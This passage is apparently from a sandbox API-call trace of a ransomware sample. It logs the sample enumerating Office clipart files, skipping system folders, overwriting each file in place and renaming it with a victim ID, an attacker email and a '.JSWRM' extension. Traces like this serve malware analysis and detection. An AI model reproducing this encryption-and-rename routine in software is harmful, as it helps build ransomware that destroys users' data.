nNumberOfBytesToRead=0xbc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xbc0, lpOverlapped=0x0) returned 1 [0085.578] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.579] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xbc0, lpOverlapped=0x0) returned 1 [0085.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0085.579] CloseHandle (hObject=0x314) returned 1 [0085.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0085.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0085.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0085.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0085.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0085.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0085.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.579] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153265.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153265.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0085.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0085.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0085.580] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e80, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153273.WMF", cAlternateFileName="")) returned 1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2=".") returned 1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2="..") returned 1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2="...") returned 1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2="windows") returned -1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2="recovery") returned -1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2="perflogs") returned -1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2="documents and settings") returned 1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2="system volume information") returned -1 [0085.580] lstrcmpiW (lpString1="J0153273.WMF", lpString2="msocache") returned -1 [0085.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0085.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153273.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153273.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153273.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0085.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0085.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153273.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153273.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153273.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0085.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0085.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0085.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0085.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153273.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.582] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20096) returned 1 [0085.582] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e80) returned 0x24d210 [0085.582] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4e80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4e80, lpOverlapped=0x0) returned 1 [0085.586] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.586] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4e80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4e80, lpOverlapped=0x0) returned 1 [0085.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.586] CloseHandle (hObject=0x314) returned 1 [0085.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0085.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0085.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0085.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0085.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0085.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0085.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.587] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153273.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153273.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153273.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0085.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0085.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0085.587] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f0c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153299.WMF", cAlternateFileName="")) returned 1 [0085.587] lstrcmpiW (lpString1="J0153299.WMF", lpString2=".") returned 1 [0085.587] lstrcmpiW (lpString1="J0153299.WMF", lpString2="..") returned 1 [0085.587] lstrcmpiW (lpString1="J0153299.WMF", lpString2="...") returned 1 [0085.587] lstrcmpiW (lpString1="J0153299.WMF", lpString2="windows") returned -1 [0085.588] lstrcmpiW (lpString1="J0153299.WMF", lpString2="recovery") returned -1 [0085.588] lstrcmpiW (lpString1="J0153299.WMF", lpString2="perflogs") returned -1 [0085.588] lstrcmpiW (lpString1="J0153299.WMF", lpString2="documents and settings") returned 1 [0085.588] lstrcmpiW (lpString1="J0153299.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.588] lstrcmpiW (lpString1="J0153299.WMF", lpString2="system volume information") returned -1 [0085.588] lstrcmpiW (lpString1="J0153299.WMF", lpString2="msocache") returned -1 [0085.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0085.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153299.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153299.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153299.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0085.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0085.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153299.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153299.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153299.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0085.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0085.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0085.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0085.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153299.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.594] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36620) returned 1 [0085.594] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f00) returned 0x24d210 [0085.594] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8f00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8f00, lpOverlapped=0x0) returned 1 [0085.597] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.597] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8f00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8f00, lpOverlapped=0x0) returned 1 [0085.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.599] CloseHandle (hObject=0x314) returned 1 [0085.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0085.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0085.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0085.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0085.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0085.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0085.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0085.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0085.599] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153299.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153299.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0085.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0085.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0085.600] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7850, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153302.WMF", cAlternateFileName="")) returned 1 [0085.600] lstrcmpiW (lpString1="J0153302.WMF", lpString2=".") returned 1 [0085.600] lstrcmpiW (lpString1="J0153302.WMF", lpString2="..") returned 1 [0085.600] lstrcmpiW (lpString1="J0153302.WMF", lpString2="...") returned 1 [0085.600] lstrcmpiW (lpString1="J0153302.WMF", lpString2="windows") returned -1 [0085.600] lstrcmpiW (lpString1="J0153302.WMF", lpString2="recovery") returned -1 [0085.600] lstrcmpiW (lpString1="J0153302.WMF", lpString2="perflogs") returned -1 [0085.601] lstrcmpiW (lpString1="J0153302.WMF", lpString2="documents and settings") returned 1 [0085.601] lstrcmpiW (lpString1="J0153302.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.601] lstrcmpiW (lpString1="J0153302.WMF", lpString2="system volume information") returned -1 [0085.601] lstrcmpiW (lpString1="J0153302.WMF", lpString2="msocache") returned -1 [0085.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0085.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153302.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153302.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153302.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0085.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0085.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153302.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153302.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153302.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0085.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0085.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0085.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0085.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153302.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.601] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30800) returned 1 [0085.601] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7850) returned 0x24d210 [0085.602] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7850, lpOverlapped=0x0) returned 1 [0085.609] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.609] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7850, lpOverlapped=0x0) returned 1 [0085.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.610] CloseHandle (hObject=0x314) returned 1 [0085.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0085.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0085.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0085.611] RtlAllocateHeap (HeapHandle=0x1e0000, 